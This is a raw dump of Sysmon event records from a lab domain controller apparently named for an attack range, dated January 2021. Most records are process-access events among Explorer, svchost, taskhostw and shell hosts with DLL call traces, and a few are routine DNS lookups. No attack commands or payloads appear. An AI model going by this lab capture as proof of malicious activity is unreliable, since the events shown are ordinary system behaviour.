13:58:32.945{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:32.945{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.945{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\Sys
tem32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.945{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:32.930{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6d1f|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+68be|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6966|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6ab5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000011792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:32.930{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d4e3|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d7a9|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+bae7e|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:32.930{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+bae7e|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:32.930{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+bae7e|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.930{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12a3cc|C:\Windows\System32\TwinUI.dll+b60d4|C:\Windows\System32\TwinUI.dll+b1e1b|C:\Windows\System32\TwinUI.dll+d206a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000011788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.930{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.930{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:32.930{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.930{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:32.930{59A5CD1D-93F9-6005-F504-00000000A301}1756872C:\Windows\system32\taskhostw.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000011783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.940{59A5CD1D-8E56-6005-2E00-00000000A301}2464ocsp.intel.com0type: 5 ocsp.comodoca.com;::ffff:151.139.128.14;C:\Windows\sysmon64.exe 10341000x800000000000000011782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.055{59A5CD1D-8E46-6005-1600-00000000A301}15442288C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:32.055{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:32.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\psmsrv.dll+e342|c:\windows\system32\psmsrv.dll+eb86|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.976{59A5CD1D-8E46-6005-1600-00000000A301}15441840C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:33.976{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000011859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E46-6005-1600-00000000A301}1544fe2.update.microsoft.com0type: 5 fe2.update.microsoft.com.nsatc.net;::ffff:40.70.224.149;::ffff:52.142.21.139;::ffff:20.188.78.189;C:\Windows\System32\svchost.exe 10341000x800000000000000011858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:33.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\psmsrv.dll+e342|c:\windows\system32\psmsrv.dll+eb86|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:33.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
